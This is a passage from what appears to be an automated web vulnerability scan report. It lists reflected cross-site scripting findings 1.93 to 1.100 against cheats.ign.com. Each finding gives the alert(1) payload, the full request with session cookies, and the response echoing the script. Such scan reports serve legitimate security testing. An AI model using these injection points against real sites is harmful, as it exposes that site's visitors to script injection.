<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/index/xbox-360-cheats/index.html?342f5"><script>alert(1)</script>f6da6f90a8e=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.93. http://cheats.ign.com/index/xbox-360-cheats/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/xbox-360-cheats/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b10a4"-alert(1)-"ad4092dec39 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/xbox-360-cheats/index.html?b10a4"-alert(1)-"ad4092dec39=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:12:59 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 151267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
ard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://cheats.ign.com/index/xbox-360-cheats/index.html?b10a4"-alert(1)-"ad4092dec39=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.94. http://cheats.ign.com/ob2/068/001/001317.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /ob2/068/001/001317.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29999"-alert(1)-"ace275002aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ob2/068/001/001317.html?29999"-alert(1)-"ace275002aa=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:19 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 110056

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
omscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://cheats.ign.com/ob2/068/001/001317.html?29999"-alert(1)-"ace275002aa=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.95. http://cheats.ign.com/ob2/068/001/001317.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /ob2/068/001/001317.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 645d7"><script>alert(1)</script>76338fa888c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ob2/068/001/001317.html?645d7"><script>alert(1)</script>76338fa888c=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:15 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 110302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/ob2/068/001/001317.html?645d7"><script>alert(1)</script>76338fa888c=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.96. http://cheats.ign.com/ob2/068/038/038020.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /ob2/068/038/038020.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ff85"><script>alert(1)</script>58343bed42e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ob2/068/038/038020.html?6ff85"><script>alert(1)</script>58343bed42e=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:12:59 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 104502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/ob2/068/038/038020.html?6ff85"><script>alert(1)</script>58343bed42e=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.97. http://cheats.ign.com/ob2/068/038/038020.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /ob2/068/038/038020.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77763"-alert(1)-"34b88f4b639 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ob2/068/038/038020.html?77763"-alert(1)-"34b88f4b639=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:02 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 104439

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
omscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://cheats.ign.com/ob2/068/038/038020.html?77763"-alert(1)-"34b88f4b639=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.98. http://cheats.ign.com/ob2/068/077/077644.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /ob2/068/077/077644.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5b6f"-alert(1)-"4d1ec130b8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ob2/068/077/077644.html?c5b6f"-alert(1)-"4d1ec130b8e=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:09 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 106691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
omscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://cheats.ign.com/ob2/068/077/077644.html?c5b6f"-alert(1)-"4d1ec130b8e=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.99. http://cheats.ign.com/ob2/068/077/077644.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /ob2/068/077/077644.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79428"><script>alert(1)</script>f8b26e0b0f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ob2/068/077/077644.html?79428"><script>alert(1)</script>f8b26e0b0f3=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:07 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 106860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/ob2/068/077/077644.html?79428"><script>alert(1)</script>f8b26e0b0f3=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.100. http://cheats.ign.com/ob2/068/077/077723.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /ob2/068/077/077723.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c538f"-alert(1)-"ca764e476e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ob2/068/077/077723.html?c538f"-alert(1)-"ca764e476e0=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:02 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 109334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
omscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://cheats.ign.com/ob2/068/077/077723.html?c538f"-alert(1)-"ca764e476e0=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

